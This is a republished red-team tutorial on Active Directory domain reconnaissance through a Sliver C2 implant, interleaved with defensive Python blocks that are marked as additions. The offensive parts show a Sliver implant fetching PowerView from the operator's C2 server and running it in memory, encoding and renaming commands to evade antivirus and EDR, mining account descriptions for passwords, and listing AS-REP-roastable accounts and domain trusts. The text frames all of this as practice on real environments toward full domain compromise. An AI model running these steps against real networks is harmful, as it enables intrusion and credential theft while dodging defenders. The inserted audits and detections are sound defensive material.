National Cyber Warfare Foundation (NCWF)

Building Command and Control (C2) Server During a Cyber War, Part 5 : Domain Reconnaissance


2025-09-28 16:11:17
milo
Red Team (CNA)

The post Building Command and Control (C2) Server During a Cyber War, Part 5 : Domain Reconnaissance first appeared on Hackers Arise.

Welcome back, cyberwarriors.

We are continuing our session on Sliver C2 and practicing in a real environment. It’s always best to apply your skills in the real world, where you learn fast. Your actions must be well thought-out and careful to avoid detection. The goal is to gain knowledge about the environment you’ve entered and ultimately compromise the entire Active Directory. In this chapter, we will focus on Domain Reconnaissance.

In Active Directory, a domain is the fundamental logical boundary that organizes and manages objects such as users, computers, and security policies within a centralized directory service. It acts as both a security and administrative unit, enabling unified authentication, authorization, and resource control across all contained entities.

Domains allow administrators to enforce policies consistently across all domain-joined systems. Group Policy Objects (GPOs), login scripts, and access permissions are scoped by the domain boundary. Multiple domains can exist within a forest, which is the top-level container in an Active Directory structure. Domains in the same forest establish two-way trust by default, allowing users in one domain to access resources in another, assuming permissions are configured accordingly.

Skipping domain reconnaissance is like trying to drive across town without a map. You waste time fumbling around and create unnecessary noise that can alert defenders. Reconnaissance reveals which accounts have elevated privileges, where domain controllers are located, and how machines interact. With this knowledge, you can choose optimal targets for implant deployment and lateral movement, all while minimizing detection risk.

PowerView

PowerView is a PowerShell-based tool designed to collect Active Directory information with minimal external dependencies. It offers numerous functions that query domain data via native Windows APIs, which helps maintain operational security by mimicking normal administrative activity.

To run PowerView, we first host the script on our C2 server using a simple Python web server. Then, we execute encoded commands with SharpSH.

Download PowerView

Let’s begin by downloading the script. Use the raw file URL; the GitHub "blob" page returns HTML rather than the script itself:

c2 > wget https://raw.githubusercontent.com/lucky-luk3/ActiveDirectory/master/PowerView.ps1

HTTP Server

Next, start an HTTP server in the directory where PowerView.ps1 is saved:

c2 > python3 -m http.server

Encoding Commands

Convert your PowerView command into Base64 to avoid syntax issues and reduce detection. Renaming PowerView.ps1 to something more benign is also recommended:

c2 > echo -n "get-netuser | select samaccountname, description" | base64

The command above queries domain users and retrieves their usernames and descriptions. Often, system administrators leave passwords in the description field, which is an invaluable opportunity for an attacker.

SharpSH

SharpSH is a .NET-based in-memory agent deployed through Sliver to execute scripts like PowerView without touching disk. It downloads PowerView from your hosted URL, runs it in memory, and sends the output back through the C2 channel. Because nothing is written to disk and everything runs inside the .NET framework, antivirus and EDR solutions have a harder time detecting it.

Get Domain Users

Using the Base64 string from earlier, we can now enumerate domain users (substitute the encoded command for the placeholder):

sliver (session) > sharpsh -- '-u http://C2:8000/PowerView.ps1 -e -c <base64 string from the step above>'

Scroll through the results. If passwords stored in account descriptions are still valid, these accounts may have excessive permissions or group memberships that can be abused for privilege escalation.
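
A defender-side counterpart to the description-field finding above, added here as an example and not part of the original post: a small audit that flags accounts whose description attribute looks like it carries a password, so they can be cleaned up before anyone enumerates them. The user records are constructed; in practice they would come from an export such as Get-ADUser -Filter * -Properties description. The keyword list and the password-shape heuristic are assumptions tuned for low noise, not a standard.

```python
"""Audit Active Directory user descriptions for credential-like text.

Added example, not code from the original post. Flags accounts whose
'description' attribute appears to carry a password, the weakness the post
describes. Records below are constructed; a real audit would feed in an
export such as Get-ADUser -Filter * -Properties description.
"""
import re

# Words that commonly precede a credential in free-text fields; a hit here is
# worth a human look even when the value after it turns out to be harmless.
CREDENTIAL_KEYWORDS = re.compile(
    r"\b(password|passwd|passphrase|pwd|pass|pw)\b\s*[:=]?\s*\S+",
    re.IGNORECASE,
)

# A token of 8+ non-space characters mixing letters, digits and a symbol.
# Heuristic (assumption): catches values like P@ssw0rd123 while ignoring
# phone extensions, ticket numbers and plain words.
PASSWORD_LIKE = re.compile(r"(?=\S*\d)(?=\S*[A-Za-z])(?=\S*[^\w\s])\S{8,}")

# Constructed sample export: samaccountname plus the description attribute.
SAMPLE_USERS = [
    {"samaccountname": "jsmith", "description": "Accounting, ext. 4412"},
    {"samaccountname": "svc_backup", "description": "Backup service account. Password: Summer2019!"},
    {"samaccountname": "helpdesk", "description": "Temp account, creds shared via ticket INC0042"},
    {"samaccountname": "svc_sql", "description": "SQL service; initial pw Sql#2020Reset"},
    {"samaccountname": "legacy_app", "description": "P@ssw0rd123 rotate me"},
    {"samaccountname": "admin2", "description": ""},
]


def find_credential_hints(users):
    """Return (samaccountname, description, reason) for each suspicious description."""
    findings = []
    for user in users:
        description = (user.get("description") or "").strip()
        if not description:
            continue
        if CREDENTIAL_KEYWORDS.search(description):
            findings.append((user["samaccountname"], description, "credential keyword"))
        elif PASSWORD_LIKE.search(description):
            findings.append((user["samaccountname"], description, "password-like token"))
    return findings


if __name__ == "__main__":
    for sam, description, reason in find_credential_hints(SAMPLE_USERS):
        print(f"{sam:12} {reason:22} {description}")
```

On the sample data the audit flags svc_backup and svc_sql on keywords and legacy_app on token shape, while the extension number and the ticket reference pass untouched; every hit still needs a person to confirm it, then a password reset and a cleared description.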

SharpView

SharpView is a C# rewrite of PowerView, offering the same functionality as a compiled .NET executable. It also doesn’t require command encoding.

Viewing Domain Information

You can gather domain information using SharpView:
sliver (session) > execute-assembly /root/tools/SharpView.exe "get-domain" -t 240 -i -E -M

This command outputs the names of the domain controllers. In our example, the domain controllers are running Windows Server 2008, which is severely outdated and vulnerable to many known exploits.

To obtain a more comprehensive overview of the domain:

sliver (session) > c2tc-domain-info

This command reveals the domain controller’s IP, the domain’s password policy, and other data.

For stealthier enumeration, use native system binaries:
sliver (session) > execute -o powershell $Forest = [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest(); $Forest.Domains

Viewing AS-REP Roastable Accounts

Accounts marked "PreauthNotRequired" can be targeted with AS-REP roasting. Because no pre-authentication is required, the attacker obtains crackable material from the KDC and brute-forces it offline, without generating failed-logon events:
sliver (session) > execute-assembly /root/tools/SharpView.exe "get-netuser -PreauthNotRequired" -t 240 -i -E -M
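
The post notes that AS-REP roasting produces no failed-logon events; what it does produce is a successful TGT request (Security Event ID 4768) with Pre-Authentication Type 0, which is the detection hook. The following is an added example, not code from the original post, that runs that check over constructed 4768 records: it flags no-preauth TGTs for accounts outside an allowlist, flags requests for RC4-HMAC (0x17), and correlates several such requests from one client address. The allowlist, the burst threshold and the sample events are assumptions.

```python
"""Detect AS-REP roasting in Kerberos TGT-request logs (Security Event ID 4768).

Added example, not code from the original post. A 4768 event with
Pre-Authentication Type 0 means a TGT was issued without pre-authentication,
which only succeeds for accounts with DONT_REQ_PREAUTH set; Ticket Encryption
Type 0x17 is RC4-HMAC, the weakest type a roasting tool can ask for. The
events below are constructed (field names follow the 4768 event); the
allowlist and burst threshold are assumptions to tune per environment.
"""
from collections import defaultdict

NO_PREAUTH = 0      # Pre-Authentication Type: logon without pre-authentication
RC4_HMAC = 0x17     # Ticket Encryption Type: RC4-HMAC
AES256 = 0x12       # Ticket Encryption Type: AES256-CTS-HMAC-SHA1-96

# Constructed sample of parsed 4768/4769 events.
SAMPLE_EVENTS = [
    {"event_id": 4768, "account": "jsmith", "pre_auth_type": 2, "ticket_encryption_type": AES256, "client_address": "10.0.0.21", "result_code": "0x0"},
    {"event_id": 4768, "account": "legacy_app", "pre_auth_type": NO_PREAUTH, "ticket_encryption_type": AES256, "client_address": "10.0.0.21", "result_code": "0x0"},
    {"event_id": 4768, "account": "legacy_app", "pre_auth_type": NO_PREAUTH, "ticket_encryption_type": RC4_HMAC, "client_address": "10.0.0.77", "result_code": "0x0"},
    {"event_id": 4768, "account": "svc_backup", "pre_auth_type": NO_PREAUTH, "ticket_encryption_type": RC4_HMAC, "client_address": "10.0.0.77", "result_code": "0x0"},
    {"event_id": 4768, "account": "old_vendor", "pre_auth_type": NO_PREAUTH, "ticket_encryption_type": RC4_HMAC, "client_address": "10.0.0.77", "result_code": "0x0"},
    {"event_id": 4768, "account": "nobody", "pre_auth_type": NO_PREAUTH, "ticket_encryption_type": RC4_HMAC, "client_address": "10.0.0.77", "result_code": "0x6"},
    {"event_id": 4769, "account": "jsmith", "pre_auth_type": None, "ticket_encryption_type": AES256, "client_address": "10.0.0.21", "result_code": "0x0"},
]

# Accounts the domain knowingly runs without pre-authentication (ideally empty).
KNOWN_NO_PREAUTH = {"legacy_app"}


def detect_asrep_roast(events, known_no_preauth=KNOWN_NO_PREAUTH, burst_threshold=2):
    """Return (client_address, account, reason) alerts for suspicious no-preauth TGT requests."""
    alerts = []
    accounts_by_source = defaultdict(set)
    for ev in events:
        # Only successful TGT requests matter here: 0x6 (unknown principal) and
        # other failures never yield crackable material, though they can show probing.
        if ev["event_id"] != 4768 or ev["result_code"] != "0x0":
            continue
        if ev["pre_auth_type"] != NO_PREAUTH:
            continue
        accounts_by_source[ev["client_address"]].add(ev["account"])
        reasons = []
        if ev["account"] not in known_no_preauth:
            reasons.append("no-preauth TGT for account outside the allowlist")
        if ev["ticket_encryption_type"] == RC4_HMAC:
            reasons.append("RC4 encryption requested")
        if reasons:
            alerts.append((ev["client_address"], ev["account"], "; ".join(reasons)))
    # One source pulling no-preauth TGTs for several accounts is the roasting pattern.
    for source, accounts in accounts_by_source.items():
        if len(accounts) >= burst_threshold:
            alerts.append((source, "*", f"{len(accounts)} no-preauth accounts from one source"))
    return alerts


if __name__ == "__main__":
    for alert in detect_asrep_roast(SAMPLE_EVENTS):
        print(alert)
```

The allowlisted legacy_app request over AES from 10.0.0.21 is treated as routine, whereas 10.0.0.77 draws three per-account alerts plus a burst alert for touching three no-preauth accounts; the same list doubles as the remediation queue for clearing the "Do not require Kerberos preauthentication" flag.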
Vulnerable certificate templates can be used for powerful persistence mechanisms. AD CS attacks are complex, but understanding them yields high-impact opportunities.

Network

Once inside the network, enumerate the network adapters; this may reveal access to internal segments. Use Sliver’s ifconfig command to retrieve adapter details without opening an interactive shell, which reduces the risk of detection.

Domain Trusts

Domain trusts allow authentication across domains. If Domain A trusts Domain B, then B’s users can access A’s resources, depending on permissions. Attackers abuse these relationships by compromising accounts in low-security domains, then leveraging trusts to access high-value targets in more secure domains. For instance, compromising a service account in a child domain could grant access to the parent domain’s file shares or domain controllers, using legitimate Kerberos tickets.

SharpView & PowerView – Get-DomainTrust

To view trust relationships in the current domain:
sliver (session) > execute-assembly /root/tools/SharpView.exe "Get-DomainTrust" -t 240 -i -E -M

SharpView & PowerView – Get-DomainTrustMapping

Unlike the previous command, Get-DomainTrustMapping goes beyond a single domain: it finds your current domain’s trusts, then follows referrals into the trusted domains, mapping every reachable trust.
sliver (session) > execute-assembly /root/tools/SharpView.exe "Get-DomainTrustMapping" -t 240 -i -E -M
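
What a trust map is worth to a defender is the blast-radius question the section opens with: if one domain falls, which others can its principals authenticate to? The following is an added example, not code from the original post, that answers it over constructed trust records shaped like the SourceName / TargetName / TrustDirection / TrustType columns PowerView and SharpView report. Direction is read from the source domain's point of view (Outbound: the source trusts the target, so the target's users can reach the source; Inbound: the reverse; Bidirectional: both), parent-child, tree-root and forest trusts are treated as transitive, external trusts as single-hop only. SID filtering and selective authentication are deliberately left out of the model, and the forest names are made up.

```python
"""Compute which domains a compromised domain can reach over AD trusts.

Added example, not from the original post: a blast-radius calculation over
a trust map such as Get-DomainTrustMapping produces. Each constructed record
is written from the SourceName domain's point of view, as PowerView/SharpView
report it. Parent-child, tree-root and forest trusts are transitive; external
trusts are not and therefore only ever provide one direct hop. SID filtering
and selective authentication are ignored to keep the model small.
"""
from collections import deque

# Constructed trust map: a hypothetical forest corp.local plus two external domains.
SAMPLE_TRUSTS = [
    {"SourceName": "corp.local", "TargetName": "dev.corp.local", "TrustDirection": "Bidirectional", "TrustType": "ParentChild"},
    {"SourceName": "corp.local", "TargetName": "eu.corp.local", "TrustDirection": "Bidirectional", "TrustType": "ParentChild"},
    {"SourceName": "eu.corp.local", "TargetName": "partner.example", "TrustDirection": "Outbound", "TrustType": "External"},
    {"SourceName": "corp.local", "TargetName": "legacy.example", "TrustDirection": "Inbound", "TrustType": "External"},
]
TRANSITIVE_TYPES = {"ParentChild", "TreeRoot", "Forest"}


def access_edges(trusts):
    """Turn trust records into directed 'principals of X can authenticate to Y' edges."""
    edges = []
    for t in trusts:
        transitive = t["TrustType"] in TRANSITIVE_TYPES
        src, dst, direction = t["SourceName"], t["TargetName"], t["TrustDirection"]
        if direction in ("Outbound", "Bidirectional"):
            edges.append((dst, src, transitive))  # source trusts target: target's users reach source
        if direction in ("Inbound", "Bidirectional"):
            edges.append((src, dst, transitive))  # target trusts source: source's users reach target
    return edges


def reachable_domains(trusts, compromised):
    """Return the set of domains (excluding the start) whose resources `compromised` principals can reach."""
    adjacency = {}
    for frm, to, transitive in access_edges(trusts):
        adjacency.setdefault(frm, []).append((to, transitive))
    reached = set()
    # State carries whether the last hop was transitive; a domain entered over a
    # non-transitive trust can still be entered again later over a transitive path.
    visited = {(compromised, True)}
    queue = deque([(compromised, 0, True)])
    while queue:
        domain, hops, chainable = queue.popleft()
        if not chainable:
            continue  # arrived over a non-transitive trust: authentication stops here
        for nxt, transitive in adjacency.get(domain, []):
            if hops > 0 and not transitive:
                continue  # an external trust further along does not extend to the start domain
            state = (nxt, transitive)
            if state in visited:
                continue
            visited.add(state)
            reached.add(nxt)
            queue.append((nxt, hops + 1, transitive))
    reached.discard(compromised)
    return reached


if __name__ == "__main__":
    for start in ("dev.corp.local", "corp.local", "partner.example"):
        print(start, "->", sorted(reachable_domains(SAMPLE_TRUSTS, start)))
```

The sample shows the transitivity caveat in practice: a compromise of dev.corp.local exposes the whole forest but not legacy.example, because that external trust is with corp.local alone, whereas a compromise of corp.local itself exposes legacy.example as well. Running this over a real export is a quick way to rank which trusts deserve SID filtering or selective authentication first.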

PowerShell

You can also use native PowerShell commands to inspect domain trust structures:

sliver (session) > execute -o powershell -Command "Get-ADTrust -Filter *"

If you have an active PowerShell session:
PS > Import-Module ActiveDirectory
PS > Get-ADTrust -Filter *

Keep in mind that PowerShell process creation may be monitored in some environments.

Netdom

Another method is netdom, which runs from cmd.exe. Unlike PowerShell, cmd attracts less scrutiny, but process creation can still be logged:

C:\ > netdom query /domain:domain.ru trust
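
The two caveats above (PowerShell process creation may be monitored; cmd is quieter but process creation can still be logged) are the hook a detection engineer works from. The following is an added example, not code from the original post, that matches constructed process-creation records, shaped like parsed Security Event 4688 or Sysmon Event 1 data, against the native-binary paths this post uses: netdom trust queries, PowerShell Get-ADTrust / Get-DomainTrust, encoded PowerShell, and the System.DirectoryServices.ActiveDirectory.Forest one-liner. The rule regexes, the sample command lines and the correlation threshold are assumptions; the Base64 string is a constructed placeholder. In-memory execution of the kind the post attributes to SharpSH and execute-assembly creates no new process and is out of scope here.

```python
"""Match process-creation telemetry against the domain-recon command lines in the post.

Added example, not code from the original post. Records are constructed to
resemble parsed Windows Security Event 4688 (or Sysmon Event 1) data. In-memory
.NET execution (sharpsh, execute-assembly) never shows up here and needs other
telemetry; these rules cover the native-binary paths the post mentions.
"""
import re

# (rule name, pattern over the command line). Patterns are assumptions tuned to the
# post's own commands, not a vendor rule set.
RULES = [
    ("netdom trust query", re.compile(r"\bnetdom(\.exe)?\b.*\bquery\b.*\btrust\b", re.I)),
    ("PowerShell AD trust enumeration", re.compile(r"\b(get-adtrust|get-domaintrust(mapping)?)\b", re.I)),
    ("Encoded PowerShell", re.compile(r"\bpowershell(\.exe)?\b.*\s-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("Forest enumeration via .NET class", re.compile(r"System\.DirectoryServices\.ActiveDirectory\.Forest", re.I)),
]

PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed sample events; the Base64 payload is a placeholder, not a real command.
SAMPLE_PROCESS_EVENTS = [
    {"event_id": 4688, "user": "CORP\\jsmith", "new_process_name": PS_EXE, "command_line": 'powershell -Command "Get-Date"'},
    {"event_id": 4688, "user": "CORP\\svc_backup", "new_process_name": r"C:\Windows\System32\netdom.exe", "command_line": "netdom query /domain:example.local trust"},
    {"event_id": 4688, "user": "CORP\\svc_backup", "new_process_name": PS_EXE, "command_line": 'powershell -Command "Get-ADTrust -Filter *"'},
    {"event_id": 4688, "user": "CORP\\svc_backup", "new_process_name": PS_EXE, "command_line": "powershell -e " + "QUFB" * 8},
    {"event_id": 4688, "user": "CORP\\svc_backup", "new_process_name": PS_EXE, "command_line": "powershell $Forest = [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest(); $Forest.Domains"},
    {"event_id": 4688, "user": "CORP\\jdoe", "new_process_name": r"C:\Windows\explorer.exe", "command_line": "explorer.exe"},
    {"event_id": 4624, "user": "CORP\\jdoe", "command_line": ""},
]


def match_recon_commands(events):
    """Return one alert dict per process-creation event whose command line hits a rule."""
    alerts = []
    for ev in events:
        if ev.get("event_id") != 4688:
            continue  # only process-creation events carry a command line worth matching
        command_line = ev.get("command_line", "")
        hits = [name for name, pattern in RULES if pattern.search(command_line)]
        if hits:
            alerts.append({"user": ev["user"], "command_line": command_line, "rules": hits})
    return alerts


def users_with_multiple_recon_hits(alerts, threshold=2):
    """Users who triggered at least `threshold` distinct rules: the enumeration sequence, not a one-off."""
    rules_by_user = {}
    for alert in alerts:
        rules_by_user.setdefault(alert["user"], set()).update(alert["rules"])
    return sorted(user for user, rules in rules_by_user.items() if len(rules) >= threshold)


if __name__ == "__main__":
    found = match_recon_commands(SAMPLE_PROCESS_EVENTS)
    for alert in found:
        print(alert["user"], alert["rules"], alert["command_line"])
    print("correlated:", users_with_multiple_recon_hits(found))
```

A single netdom or Get-ADTrust invocation is routine admin work in many shops; the correlation step is what separates a domain-wide walk by one account from noise, and in the sample it singles out svc_backup, which is also a service account that should rarely be spawning interactive tooling at all.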

Conclusion

By thoroughly mapping a domain’s structure, privileges, and trust relationships, you gain the information needed to move stealthily toward full compromise. Tools like PowerView, SharpSH, SharpView, and native commands allow you to collect critical information without triggering alerts. Always validate the security posture of accounts, certificates, and domain configurations, because misconfigurations and outdated systems are the weak points that enable a successful breach.

Source: HackersArise
Source Link: https://hackers-arise.com/building-command-and-control-c2-server-during-a-cyber-war-part-5-domain-reconnaissance/

Copyright 2012 through 2025 - National Cyber Warfare Foundation - All rights reserved worldwide.